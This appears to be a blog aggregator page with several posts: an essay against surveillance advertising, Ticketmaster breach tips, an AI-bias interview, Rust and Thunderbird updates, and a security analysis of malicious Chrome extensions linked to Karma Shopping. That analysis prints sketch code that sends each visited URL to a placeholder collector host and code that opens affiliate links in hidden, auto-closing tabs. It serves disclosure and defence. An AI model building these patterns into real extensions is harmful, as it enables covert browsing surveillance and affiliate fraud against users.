Compromising with the dystopia narrative always looks like the realistic or grown-up path forward, until it doesn’t. And then the non-dystopia timeline generally looks inevitable once you get far enough along it. This time it’s the same way. We don’t need cross-context personalized (surveillance) advertising in our web browsers any more than we need SCO licenses in our operating systems (not counting the SCO license timeline as a dystopia, but it’s another good example of a dismal timeline averted). Let’s look at the numbers. I’m going to make all the assumptions most favorable to the surveillance advertising argument. It’s actually probably a lot better than this. And it’s probably better in other countries, since the USA is relatively advanced in the commercial surveillance field. (If you have these figures for other countries, please let me know and I’ll link to them.)

Total money spent on advertising in the USA: $389.49 billion

USA population: 335,893,238

That comes out to about $1,160 spent on advertising to reach the average person in the USA every year. That’s $97 per month.

So let’s assume (again, making the assumption most favorable to the surveillance side) that all advertising is surveillance advertising. And ads without the surveillance, according to Professor Garrett Johnson, are worth 52 percent less than the surveillance ads.

So if you get rid of the surveillance, your ad subsidy goes from $97 to $46. Advertisers would be spending $51 less to advertise to you, and the missing $51 is a good-sized amount of extra money to come up with every month. But remember, that’s advertising money, total, not the amount that actually makes it to the people who make the ad-supported resources you want. Since the problem is how to replace the income for the artists, writers, and everyone else who makes ad-supported content, we need to multiply the missing ad subsidy by the fraction of that top-level advertising total that makes it through to the content creator in order to come up with the amount of money that needs to be filled in from other sources like subscriptions and memberships.

How much do you need to spend on subscriptions to replace $51 in ad money? That’s going to depend on your habits. But even if you have everything set up totally right, a dollar spent on ads to reach you will buy you less than a dollar you spend yourself. Thomas Baekdal writes, in How independent publishing has changed from the 1990s until today,

Up until this point, every publisher had focused on ‘traffic at scale’, but with the new direct funding focus, every individual publisher realized that traffic does not equal money, and you could actually make more money by having an audience who paid you directly, rather than having a bunch of random clicks for the sake of advertising. The ratio was something like 1:10,000. Meaning that for every one person you could convince to subscribe, donate, become a member, or support you on Patreon … you would need 10,000 visitors to make the same amount from advertising. Or to put that into perspective, with only 100 subscribers, I could make the same amount of money as I used to earn from having one million visitors.

All surveillance ad media add some kind of adtech tax. The Association of National Advertisers found that about 1/3 of the money spent to buy ad space makes it through to the publisher.

A subscription platform and subscriber services impose some costs too. To be generous to the surveillance side, let’s say that a subscription dollar is only three times as valuable as an advertising dollar. So that $51 in missing ad money means you need to come up with $17 from somewhere. This estimate is really on the high side in practice. A lot of ad money goes to stuff like retail ad networks (online sellers bidding for better spots in shopping search results) and to ad media like billboards that don’t pay for content at all.

So, worst case, where do you get the $17? From buying less crap, that’s where. Mustri et al. (PDF) write,

[behaviorally] targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products…

You also get a piece of the national security and other collective security benefits of eliminating surveillance, some savings in bandwidth and computing resources, and a lower likelihood of becoming a victim of fraud and identity theft. But that’s pure bonus benefit on top of the win from saving money by spending less on overpriced, personally targeted, low-quality products. (If privacy protection didn’t help you buy better stuff, the surveillance companies would have said so by now, it’s an easy query to run.) Because surveillance advertising gives an advantage to deceptive advertisers over legit ones, the end of surveillance advertising would also mean an increase in sales for legit brands.

And we’re not done. As a wise man once said, But wait! There’s more! Before you rush to do effective privacy tips or write to your state legislators to support anti-surveillance laws, there’s one more benefit of getting rid of surveillance/personalized advertising. Remember that extra $51 that went away? It didn’t get burned up in a fire just because it didn’t get spent on surveillance advertising. Companies still have it, and they still want to sell you stuff. Without surveillance, they’ll have to look for other ways to spend it. And many of the options are win-win for the customer. In Product is the P all marketers should strive to influence, Mark Ritson points out the marketing wins from incremental product improvements, and that’s the kind of work that often gets ignored in favor of niftier, short-term, surveillance advertising projects. Improving service and pricing are other areas that will also do better without surveillance advertising contending for budgets. There is a lot of potential gain for a lot of people in getting rid of surveillance advertising, so let’s not waste the opportunity. Don’t worry, we’ll get another Internet dystopia narrative to worry about eventually.

More: stop putting privacy-enhancing technologies in web browsers

Related

Product is the P all marketers should strive to influence If there is one thing I have learned from a thousand customers discussing a hundred different products it’s that the things a company thinks are small are, from a consumer perspective, big. And the grand improvements the company is spending bazillions on are probably of little significance. Finding out from the source what needs to be fixed or changed and then getting it done is the quiet product work of proper marketers. (yes, I linked to this twice.)

Bonus links

Marketers in a dying internet: Why the only option is a return to simplicity With machine-generated content now cluttering the most visible online touchpoints (like the frontpage of Google, or your Facebook timeline), it feels inevitable that consumer behaviors will shift as a result. And so marketers need to change how they reach target audiences.

I attended Google’s creator conversation event, and it turned into a funeral

Is AI advertising going to be too easy for its own good? As Rory Sutherland said, When human beings process a message, we sort of process how much effort and love has gone into the creation of this message and we pay attention to the message accordingly. It’s costly signaling of a kind.

How Google is Killing Bloggers and Small Publishers – And Why

Exploiting Meta’s Weaknesses, Deceptive Political Ads Thrived on Facebook and Instagram in Run-Up to Election

Ninth Circuit Upholds AADC Ban on “Dark Patterns”

Economist ‘future-proofing’ bid brings back brand advertising and targets students

The Talospace Project: Updated Baseline JIT OpenPOWER patches for Firefox 128ESR

I updated the Baseline JIT patches to apply against Firefox 128ESR, though if you use the Mercurial rebase extension (and you should), it will rebase automatically and only one file had to be merged — which it did for me also. Nevertheless, everything is up to date against tip again, and this patchset works fine for both Firefox and Thunderbird. I kept the fix for bug 1912623 because I think Mozilla's fix in bug 1909204 is wrong (or at least suboptimal) and this is faster on systems without working Wasm. Speaking of, I need to get back into porting rr to ppc64le so I can solve those startup crashes.

The Mozilla Blog: After Ticketmaster’s data breach, it’s time to secure your info

Still in its “anti-hero” era, Ticketmaster has users reeling from a data breach last May, when a hacker group claimed to have stolen data from more than 500 million people.

The breach coincided with Taylor Swift’s Eras Tour, one of the biggest tours ever that just so happened to have one of the most problematic rollouts ever. (So many fans tried to buy presale tickets that Ticketmaster’s system crashed, forcing the company to cancel the general sale — yet bots and scalpers still managed to grab tickets.)

So what do you do after a massive data breach?

Use 2FA

Two-factor authentication (2FA if you’re into brevity) is a simple and effective way to add an extra layer of security to your logins.

Change old passwords

Look. We get it. “FearlessSwiftie13!” is a pretty solid password. But if you’ve been using it since 2008, it’s time to update it. Make it something less obvious, maybe even use Firefox’s password generator. Don’t re-use passwords. If they’re easy to remember, they’re easy to hack.

Mozilla Monitor

Not to plug our own thing, but Mozilla Monitor does a pretty good job of showing what personal data was actually breached. We recommend the free scan; it’ll tell you if your phone number, passwords or home address have been leaked and alert you to future breaches, so you can act accordingly and stay in the loop.

No phish

Because the Ticketmaster data breach was so big, many people’s information could now be in the hands of scammers, who may use the data they got to pose as Ticketmaster or concert venues, to steal even more of your information. Be on the lookout for any emails or texts that seem suspicious or off.

Keep tabs on your statements

Regularly review your credit card statements. Pick a day and make it a habit. Even if you haven’t been part of a headline-making breach, it’s smart – you’ll catch any unfamiliar charges and can report them to your card issuer right away.

Data breaches are no fun, but they do help people snap out of their old (and easily hackable) habits. By using a combination of the steps above and some good ol’ fashioned common sense, you’ll minimize the risk of them happening again.

Find where your private info is exposed

Get a free scan

The post After Ticketmaster’s data breach, it’s time to secure your info appeared first on The Mozilla Blog.

Mozilla Performance Blog: Performance Testing Newsletter (Q3 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products.

Last quarter was MozWeek, and we had a great time meeting a number of you in our PerfTest Regression Workshop – thank you all for joining us, and making it a huge success! If you didn’t get a chance to make it, you can find the slides here, and most of the information from the workshop (including some additional bits) can be found in this documentation page. We will be running this workshop again next MozWeek, along with a more advanced version.

See below for highlights from the changes made in the last quarter.

Highlights

Blog Posts ✍️

Contributors

  • Myeongjun Go [:myeongjun]
  • Mayank Bansal [:mayankleoboy1]

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Mozilla Blog: The AI problem we can’t ignore

In August 2020, as the pandemic confined people to their homes, the U.K. canceled A-level exams and turned to an algorithm to calculate grades, key for university admissions. Based on historical data that reflected the resource advantages of private schools, the algorithm disproportionately downgraded state school students. Those who attended private schools, meanwhile, received inflated grades. News of the results set off widespread backlash. The system reinforced social inequities, critics said.

This isn’t just a one-off mistake – it’s a sign of AI bias creeping into our lives, according to Gemma Galdon-Clavell, a tech policy expert and one of Mozilla’s 2025 Rise25 honorees. Whether it’s deciding who gets into college or a job, who qualifies for a loan, or how health care is distributed, bias in AI can set back efforts toward a more equitable society.

In an opinion piece for Context by the Thomson Reuters Foundation, Gemma asks us to consider the consequences of not addressing this issue. She argues that bias and fairness are the biggest yet often overlooked threats of AI. You can read her essay here.

We chatted with Gemma about her piece below. 

Can you give examples of how AI is already affecting us?

AI is involved in nearly everything — whether you’re applying for a job, seeing a doctor, or applying for housing or benefits. Your resume might be screened by an AI, your wait time at the hospital could be determined by an AI triage system, and decisions about loans or mortgages are often assisted by AI. It’s woven into so many aspects of decision-making, but we don’t always see it.

Why is bias in AI so problematic?

AI systems look for patterns and then replicate them. These patterns are based on majority data, which means that minorities — people who don’t fit the majority patterns — are often disadvantaged. Without specific measures built into AI systems to address this, they will inevitably reinforce existing biases. Bias is probably the most dangerous technical challenge in AI, and it’s not being tackled head-on.

How can we address these issues?

At Eticas, we build software to identify outliers — people who don’t fit into majority patterns. We assess whether these outliers are relevant and make sure they aren’t excluded from positive outcomes. We also run a nonprofit that helps communities affected by biased AI systems. If a community feels they’ve been negatively impacted by an AI system, we work with them to reverse-engineer it, helping them understand how it works and giving them the tools to advocate for fairer systems.

What can someone do if an AI system affects them, but they don’t fully understand how it works?

Unfortunately, not much right now. Often, people don’t even know an AI system made a decision about their lives. And there aren’t many mechanisms in place for contesting those decisions. It’s different from buying a faulty product, where you have recourse. If AI makes a decision you don’t agree with, there’s very little you can do. That’s one of the biggest challenges we need to address — creating systems of accountability for when AI makes mistakes.

You’ve highlighted the challenges. What gives you hope about the future of AI?

The progress of our work on AI auditing! For years now we’ve been showing how there is an alternative AI future, one where AI products are built with trust and safety at heart, where AI audits are seen as proof of responsibility and accountability — and ultimately, safety. I often mention how my work is to build the seatbelts of AI, the pieces that make innovation safer and better. A world where we find non-audited AI as unthinkable as cars without seatbelts or brakes, that’s an AI future worth fighting for.

The post The AI problem we can’t ignore appeared first on The Mozilla Blog.

The Rust Programming Language Blog: October project goals update

The Rust project is currently working towards a slate of 26 project goals, with 3 of them designated as flagship goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

The biggest elements of our goal are solving the "send bound" problem via return-type notation (RTN) and adding support for async closures. This month we made progress towards both. For RTN, @compiler-errors landed support for using RTN in self-types like where Self::method(): Send. He also authored a blog post with a call for testing explaining what RTN is and how it works. For async closures, the lang team reached a preliminary consensus on the async Fn syntax, with the understanding that it will also include some "async type" syntax. This rationale was documented in RFC #3710, which is now open for feedback. The team held a design meeting on Oct 23 and @nikomatsakis will be updating the RFC with the conclusions.

We have also been working towards a release of the dynosaur crate that enables dynamic dispatch for traits with async functions. This is intended as a transitional step before we implement true dynamic dispatch. The next steps are to polish the implementation and issue a public call for testing.

With respect to async drop experiments, @nikomatsakis began reviews. It is expected that reviews will continue for some time as this is a large PR.

Finally, no progress has been made towards async WG reorganization. A meeting was scheduled but deferred. @tmandry is currently drafting an initial proposal.

We have made significant progress on resolving blockers to Linux building on stable. Support for struct fields in the offset_of! macro has been stabilized. The final naming for the "derive-smart-pointer" feature has been decided as #[derive(CoercePointee)]; @dingxiangfei2009 prepared PR #131284 for the rename and is working on modifying the rust-for-linux repository to use the new name. Once that is complete, we will be able to stabilize. We also decided to stabilize support for references to statics in constants (the pointers-refs-to-static feature) and are now awaiting a stabilization PR from @dingxiangfei2009.

Rust for Linux (RfL) is one of the major users of the asm-goto feature (and inline assembly in general) and we have been examining various extensions. @nbdd0121 authored a hackmd document detailing RfL's experiences and identifying areas for improvement. This led to two immediate action items: making target blocks safe-by-default (rust-lang/rust#119364) and extending const to support embedded pointers (rust-lang/rust#128464).

Finally, we have been finding an increasing number of stabilization requests at the compiler level, and so @wesleywiser and @davidtwco from the compiler team have started attending meetings to create a faster response. One of the results of that collaboration is RFC #3716, authored by Alice Ryhl, which proposes a method to manage compiler flags that modify the target ABI. Our previous approach has been to create distinct targets for each combination of flags, but the number of flags needed by the kernel makes that impractical. Authoring the RFC revealed more such flags than previously recognized, including those that modify LLVM behavior.

The Rust 2024 edition is progressing well and is on track to be released on schedule. The major milestones include preparing to stabilize the edition by November 22, 2024, with the actual stabilization occurring on November 28, 2024. The edition will then be cut to beta on January 3, 2025, followed by an announcement on January 9, 2025, indicating that Rust 2024 is pending release. The final release is scheduled for February 20, 2025.

The priorities for this edition have been to ensure its success without requiring excessive effort from any individual. The team is pleased with the progress, noting that this edition will be the largest since Rust 2015, introducing many new and exciting features. The process has been carefully managed to maintain high standards without the need for high-stress heroics that were common in past editions. Notably, the team has managed to avoid cutting many items from the edition late in the development process, which helps prevent wasted work and burnout.

All priority language items for Rust 2024 have been completed and are ready for release. These include several key issues and enhancements. Additionally, there are three changes to the standard library, several updates to Cargo, and an exciting improvement to rustdoc that will significantly speed up doctests.

This edition also introduces a new style edition for rustfmt, which includes several formatting changes.

The team is preparing to start final quality assurance crater runs. Once these are triaged, the nightly beta for Rust 2024 will be announced, and wider testing will be solicited.

Rust 2024 will be stabilized in nightly in late November 2024, cut to beta on January 3, 2025, and officially released on February 20, 2025. More details about the edition items can be found in the Edition Guide.

Goals with updates

  • camelid has started working on using the new lowering schema for more than just const parameters, which once done will allow the introduction of a min_generic_const_args feature gate.
  • compiler-errors has been working on removing the eval_x methods on Const that do not perform proper normalization and are incompatible with this feature.
  • Posted the September update.
  • Created more automated infrastructure to prepare the October update, utilizing an LLM to summarize updates into one or two sentences for a concise table.
  • No progress has been made on this goal.
  • The goal will be closed as consensus indicates stabilization will not be achieved in this period; it will be revisited in the next goal period.
  • No major updates to report.
  • Preparing a talk for next week's EuroRust has taken away most of the free time.
  • Key developments: With the PR for supporting implied super trait bounds landed (#129499), the current implementation is mostly complete in that it allows most code that should compile, and should reject all code that shouldn't.
  • Further testing is required, with the next steps being improving diagnostics (#131152), and fixing more holes before const traits are added back to core.
  • A work-in-progress pull request is available at https://github.com/weihanglo/cargo/pull/66.
  • The use of wasm32-wasip1 as a default sandbox environment is unlikely due to its lack of support for POSIX process spawning, which is essential for various build script use cases.
  • The Autodiff frontend was merged, including over 2k LoC and 30 files, making the remaining diff much smaller.
  • The Autodiff middle-end is likely getting a redesign, moving from a library-based to a pass-based approach for LLVM.
  • Significant progress was made with contributions by @x-hgg-x, improving the resolver test suite in Cargo to check feature unification against a SAT solver.
  • This was followed by porting the test cases that tripped up PubGrub to Cargo's test suite, laying the groundwork to prevent regression on important behaviors when Cargo switches to PubGrub and preparing for fuzzing of features in dependency resolution.
  • The team is working on a consensus for handling generic parameters, with both PRs currently blocked on this issue.
  • Attempted stabilization of -Znext-solver=coherence was reverted due to a hang in nalgebra, with subsequent fixes improving but not fully resolving performance issues.
  • No significant changes to the new solver have been made in the last month.
  • GnomedDev pushed rust-lang/rust#130553, which replaced an old Clippy infrastructure with a faster one (moving from string matching to symbol matching).
  • Inspections into Clippy's type sizes and cache alignment are being started, but nothing fruitful yet.
  • The linting behavior was reverted until an unspecified date.
  • The next steps are to decide on the future of linting and to write the never patterns RFC.
  • The PR https://github.com/rust-lang/crates.io/pull/9423 has been merged.
  • Work on the frontend feature is in progress.
  • Key developments in the 'Scalable Polonius support on nightly' project include fixing test failures due to off-by-one errors from old mid-points, and ongoing debugging of test failures with a focus on automating the tracing work.
  • Efforts have been made to accept variations of issue #47680, with potential adjustments to active loans computation and locations of effects. Amanda has been cleaning up placeholders in the work-in-progress PR #130227.
  • rust-lang/cargo#14404 and rust-lang/cargo#14591 have been addressed.
  • Waiting on time to focus on this in a couple of weeks.
  • Key developments: Added the cases in the issue list to the UI test to reproduce the bug or verify the non-reproducibility.
  • Blockers: none.
  • Help wanted: Help test the deadlock code in the issue list and try to reproduce the issue.
  • Students from the CMU Practicum Project have started writing function contracts that include safety conditions for some unsafe functions in the core library, and verifying that safe abstractions respect those pre-conditions and are indeed safe.
  • Help is needed to write more contracts, integrate new tools, review pull requests, or participate in the repository discussions.
  • Progress has been made in matching rustc suggestion output within annotate-snippets, with most cases now aligned.
  • The focus has been on understanding and adapting different rendering styles for suggestions to fit within annotate-snippets.

Goals without updates

The following goals have not received updates in the last month:

Mozilla ThunderbirdThunderbird for Android 8.0 Takes Flight

Just over two years ago, we announced our plans to bring Thunderbird to Android by taking K-9 Mail under our wing. The journey took a little longer than we had originally anticipated and there was a lot to learn along the way, but the wait is finally over! For all of you who have ever asked “when is Thunderbird for Android coming out?”, the answer is – today! We are excited to announce that the first stable release of Thunderbird for Android is out now, and we couldn’t be prouder of the newest, most mobile member of the Thunderbird family.

Resources

Thanks for Helping Thunderbird for Android Fly

Thank you for being a part of the community and sharing this adventure on Android with us! We’re especially grateful to all of you who have helped us test the beta and release candidate images. Your feedback helped us find and fix bugs, test key features, and polish the stable release. We hope you enjoy using the newest Thunderbird, now and for a long time to come!

The post Thunderbird for Android 8.0 Takes Flight appeared first on The Thunderbird Blog.

Wladimir PalantThe Karma connection in Chrome Web Store

Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users’ every move to some Amazon cloud server. But that wasn’t all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don’t appear to be malicious yet.

While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than 50 people and secured tons of cash in venture capital. Maybe a mistake on my part?

After looking at it thoroughly, this explanation seems unlikely. Not only does Karma share some backend infrastructure and considerable amounts of code with the malicious extensions. Not only does Karma Shopping Ltd. admit to selling users’ browsing profiles in their privacy policy. There is even more tying them together, including a mobile app developed by Karma Shopping Ltd. whereas the identical Chrome extension is supposedly developed by the mysterious evildoer.

Screenshot of the karmanow.com website, with the Karma logo visible and a yellow button “Add to Chrome - It’s Free”

The affected extensions

Most of the extensions in question changed hands relatively recently, the first ones in the summer of 2023. The malicious code was added immediately after the ownership transfer, with some extensions even requesting additional privileges, citing bogus reasons. A few extensions have been developed this year by whoever is behind this.

Some extensions from the latter group don’t have any obvious malicious functionality at this point. If there is tracking, it only covers the usage of the extension’s user interface rather than the entire browsing behavior. This can change at any time of course.

Name Weekly active users Extension ID Malicious functionality
Hide YouTube Shorts 100,000 aljlkinhomaaahfdojalfmimeidofpih Affiliate fraud, browsing profile collection
DarkPDF 40,000 cfemcmeknmapecneeeaajnbhhgfgkfhp Affiliate fraud, browsing profile collection
Sudoku On The Rocks 1,000 dncejofenelddljaidedboiegklahijo Affiliate fraud
Dynamics 365 Power Pane 70,000 eadknamngiibbmjdfokmppfooolhdidc Affiliate fraud, browsing profile collection
Israel everywhere 70 eiccbajfmdnmkfhhknldadnheilniafp
Karma | Online shopping, but better 500,000 emalgedpdlghbkikiaeocoblajamonoh Browsing profile collection
Where is Cookie? 93 emedckhdnioeieppmeojgegjfkhdlaeo
Visual Effects for Google Meet 1,000,000 hodiladlefdpcbemnbbcpclbmknkiaem Affiliate fraud
Quick Stickies 106 ihdjofjnmhebaiaanaeeoebjcgaildmk
Nucleus: A Pomodoro Timer and Website Blocker 20,000 koebbleaefghpjjmghelhjboilcmfpad Affiliate fraud, browsing profile collection
Hidden Airline Baggage Fees 496 kolnaamcekefalgibbpffeccknaiblpi Affiliate fraud
M3U8 Downloader 100,000 pibnhedpldjakfpnfkabbnifhmokakfb Affiliate fraud

Hiding in plain sight

Whoever wrote the malicious code chose not to obfuscate it but to make it blend in with the legitimate functionality of the extension. Clearly, the expectation was that nobody would look at the code too closely. So there is for example this:

if (window.location.href.startsWith("http") ||
    window.location.href.includes("m.youtube.com")) {
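  // the calls to the malicious functions go here (elided)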
  
}

It looks like the code inside the block would only run on YouTube. Only when you stop and consider the logic properly do you realize that it runs on every website: the first condition already matches every http(s) URL, so the YouTube check is irrelevant. In fact, that’s the block wrapping the calls to malicious functions.

The malicious functionality is split between content script and background worker for the same reason, even though it could have been kept in one place. This way each part looks innocuous enough: there is some data collection in the content script, and then it sends a check_shorts message to the background worker. And the background worker “checks shorts” by querying some web server. Together this just happens to send your entire browsing history into the Amazon cloud.
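
As a rough illustration of that split, here is a simplified sketch in extension-style JavaScript. It is not the actual code of any of these extensions; the check_shorts message name is taken from the analysis above, and the endpoint is a placeholder.

// Content script: gather the current address and send an innocent-sounding message.
chrome.runtime.sendMessage({ type: "check_shorts", url: window.location.href });

// Background worker: "check shorts" by asking a remote server, which as a
// side effect receives every page the user visits.
chrome.runtime.onMessage.addListener((message) => {
  if (message.type === "check_shorts") {
    fetch("https://collector.example.com/check?u=" + encodeURIComponent(message.url));
  }
});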

Similarly, there are some complicated checks in the content script which eventually result in a loadPdfTab message to the background worker. The background worker dutifully opens a new tab for that address and, strangely, closes it after 9 seconds. Only when you sort through the layers does it become obvious that this is actually about adding an affiliate cookie.

And of course there is the usual bunch of complicated conditions, making sure that this functionality is not triggered too soon after installation and generally doesn’t fire reliably enough for users to trace it back to this extension.

Affiliate fraud functionality

The affiliate fraud functionality is tied to the kra18.com domain. When this functionality is active, the extension will regularly download data from https://www.kra18.com/v1/selectors_list?&ex=90 (90 being the extension ID here, the server accepts eight different extension IDs). That’s a long list containing 6,553 host names:

Screenshot of JSON data displayed in the browser. The selectors key is expanded, twenty domain names like drinkag1.com are visible in the list.

Whenever one of these domains is visited and the moons are aligned in the right order, another request to the server is made with the full address of the page you are on. For example, the extension could request https://www.kra18.com/v1/extension_selectors?u=https://www.tink.de/&ex=90:

Screenshot of JSON data displayed in the browser. There are keys shortsNavButtonSelector, url and others. The url key contains a lengthy URL from awin1.com domain.

The shortsNavButtonSelector key is another red herring, the code only appears to be using it. The important key is url, the address to be opened in order to set the affiliate cookie. And that’s the address sent via loadPdfTab message mentioned before if the extension decides that right now is a good time to collect an affiliate commission.
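
Based on the behavior described above, the background worker’s part amounts to something like this sketch. The loadPdfTab message name and the 9-second delay come from the analysis; the rest is illustrative rather than the extensions’ actual code.

chrome.runtime.onMessage.addListener((message) => {
  if (message.type === "loadPdfTab") {
    // Despite the name, no PDF is involved: open the affiliate link in a new
    // tab so the affiliate cookie gets set, then quietly close the tab again.
    chrome.tabs.create({ url: message.url }, (tab) => {
      setTimeout(() => chrome.tabs.remove(tab.id), 9000);
    });
  }
});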

There are also additional “selectors,” downloaded from https://www.kra18.com/v1/selectors_list_lr?&ex=90. Currently this functionality is only used on the amazon.com domain and will replace some product links with links going through jdoqocy.com domain, again making sure an affiliate commission is collected. That domain is owned by Common Junction LLC, an affiliate marketing company that published a case study on how their partnership with Karma Shopping Ltd. (named Shoptagr Ltd. back then) helped drive profits.

Browsing profile collection

Some of the extensions will send each page visit to https://7ng6v3lu3c.execute-api.us-east-1.amazonaws.com/EventTrackingStage/prod/rest. According to the extension code, this is an Alooma backend. Alooma is a data integration platform which was acquired by Google a while ago. Data transmitted could look like this:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: token: sBGUbZm3hp, timestamp: 1730137880441, user_id: 90, distinct_id: 7796931211, navigator_language: en-US, referrer: https://www.google.com/, local_time: Mon Oct 28 2024 18:51:20 GMT+0100 (Central European Standard Time), event: page_visit, component: external_extension, external: true, current_url: https://example.com/

Yes, this is sent for each and every page loaded in the browser, at least after you’ve been using the extension for a while. And distinct_id is my immutable user ID here.

But wait, it’s a bit different for the Karma extension. Here you can opt out! Well, that’s only if you are using Firefox because Mozilla is rather strict about unexpected data collection. And if you manage to understand what “User interactions” means on this options page:

Screenshot of an options page with two switches labeled User interactions and URL address. The former is described with the text: Karma is a community of people who are working together to help each other get a great deal. We collect anonymized data about coupon codes, product pricing, and information about Karma is used to contribute back to the community. This data does not contain any personably identifiable information such as names or email addresses, but may include data supplied by the browser such as url address.

Well, I may disagree with the claim that url addresses do not contain personably identifiable information. And: yes, this is the entire page. There really isn’t any more text.

The data transmitted is also somewhat different:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: referrer: https://www.google.com/, current_url: https://example.com/, browser_version: 130, tab_id: 5bd19785-e18e-48ca-b400-8a74bf1e2f32, event_number: 1, browser: chrome, event: page_visit, source: extension, token: sBGUbZm3hp, version: 10.70.0.21414, timestamp: 1730138671937, user_id: 6372998, distinct_id: 6b23f200-2161-4a1d-9400-98805c17b9e3, navigator_language: en-US, local_time: Mon Oct 28 2024 19:04:31 GMT+0100 (Central European Standard Time), ui_config: old_save, save_logic: rules, show_k_button: true, show_coupon_scanner: true, show_popups: true

The user_id field no longer contains the extension ID but my personal identifier, complementing the identifier in distinct_id. There is a tab_id field adding more context, so that it is not only possible to recognize which page I navigated to and from where but also to distinguish different tabs. And some more information about my system is always useful of course.

Who is behind this?

Eleven extensions on my list are supposedly developed by a person going by the name Rotem Shilop or Roni Shilop or Karen Shilop. This isn’t a very common last name, and if this person really exists, they managed to leave no traces online. Yes, I also searched in Hebrew. Yet one extension is developed by Karma Shopping Ltd. (formerly Shoptagr Ltd.), a company based in Israel with at least 50 employees. An accidental association?

It doesn’t look like it. I’m not going into the details of shared code and tooling, let’s just say: it’s very obvious that all twelve extensions are being developed by the same people. Of course, there is still the possibility that the eleven malicious extensions are not associated directly with Karma Shopping but with some rogue employee or contractor or business partner.

However, it isn’t only the code. As explained above, five extensions including Karma share the same tracking backend which is found nowhere else. They are even sending the same access token. Maybe this backend isn’t actually run by Karma Shopping and they are only one of the customers of some third party? Yet if you look at the data being sent, clearly the Karma extension is considered first-party. It’s the other extensions which are sending external: true and component: external_extension flags.

Then maybe Karma Shopping is merely buying data from a third party, without actually being affiliated with their extensions? Again, this is possible but unlikely. One indicator is the user_id field in the data sent by these extensions. It’s the same extension ID that they use for internal communication with the kra18.com server. If Karma Shopping were granting a third party access to their server, wouldn’t they assign that third party some IDs of their own?

And those affiliate links produced by the kra18.com server? Some of them clearly mention karmanow.com as the affiliate partner.

Screenshot of JSON data displayed in the browser. url key is a long link pointing to go.skimresources.com. sref query parameter of the link is https://karmanow.com. url query parameter of the link is www.runinrabbit.com.

Finally, if we look at Karma Shopping’s mobile apps, they develop two of them. In addition to the Karma app, the app stores also contain an app called “Sudoku on the Rocks,” developed by Karma Shopping Ltd. Which is a very strange coincidence because an identical “Sudoku on the Rocks” extension also exists in the Chrome Web Store. Here however the developer is Karen Shilop. And Karen Shilop chose to include hidden affiliate fraud functionality in their extension.

By the way, guess who likes the Karma extension a lot and left a five-star review?

Screenshot of a five-star review by Rona Shilop with a generic-looking avatar of woman with a cup of coffee. The review text says: Thanks for making this amazing free extension. There is a reply by Karma Support saying: We’re so happy to hear how much you enjoy shopping with Karma.

I contacted Karma Shopping Ltd. via their public relations address about their relationship to these extensions and the Shilop person but didn’t hear back so far.

Update (2024-10-30): An extension developer told me that they were contacted on multiple independent occasions about selling their Chrome extension to Karma Shopping, each time by C-level executives of the company, from official karmanow.com email addresses. The first outreach was in September 2023, where Karma was supposedly looking into adding extensions to their portfolio as part of their growth strategy. They offered to pay between $0.2 and $1 per weekly active user.

What does Karma Shopping want with the data?

It is obvious why Karma Shopping Ltd. would want to add their affiliate functionality to more extensions. After all, affiliate commissions are their line of business. But why collect browsing histories? Only to publish semi-insightful articles on people’s shopping behavior?

Well, let’s have a look at their privacy policy which is actually meaningful for a change. Under 1.3.4 it says:

Browsing Data. In case you a user of our browser extensions we may collect data regarding web browsing data, which includes web pages visited, clicked stream data and information about the content you viewed.

How we Use this Data. We use this Personal Data (1) in order to provide you with the Services and feature of the extension and (2) we will share this data in an aggregated, anonymized manner, for marketing research and commercial use with our business partners.

Legal Basis. (1) We process this Personal Data for the purpose of providing the Services to you, which is considered performance of a contract with you. (2) When we process and share the aggregated and anonymized data we will ask for your consent.

First of all, this tells us that Karma collecting browsing data is official. They also openly state that they are selling it. Good to know and probably good for their business as well.

As to the legal basis: I am no lawyer but I have a strong impression that they don’t deliver on the “we will ask for your consent” promise. No, not even that Firefox options page qualifies as informed consent. And this makes this whole data collection rather doubtful in the light of GDPR.

There is also a difference between anonymized and pseudonymized data. The data collection seen here is pseudonymized: while it doesn’t include my name, there is a persistent user identifier which is still linked to me. It is usually fairly easy to deanonymize pseudonymized browsing histories, e.g. because people tend to visit their social media profiles rather often.

Actually anonymized data would not allow associating it with any single person. This is very hard to achieve, and we’ve seen promises of aggregated and anonymized data go very wrong. While it’s theoretically possible that Karma correctly anonymizes and aggregates data on the server side, this is a rather unlikely outcome for a company that, as we’ve seen above, confuses the lack of names and email addresses with anonymity.

But of course these considerations only apply to the Karma extension itself. Because related extensions like Hide YouTube Shorts just straight out lie:

Screenshot of a Chrome Web Store listing. Text under the heading Privacy: The developer has disclosed that it will not collect or use your data.

Some of these extensions actually used to have a privacy policy before they were bought. Now only three still have an identical and completely bogus privacy policy. Sudoku on the Rocks happens to be among these three, and the same privacy policy is linked by the Sudoku on the Rocks mobile apps which are officially developed by Karma Shopping Ltd.

This Week In RustThis Week in Rust 571

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is tower-http-client, a library of middlewares and various utilities for HTTP-clients.

Thanks to Aleksey Sidorov for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
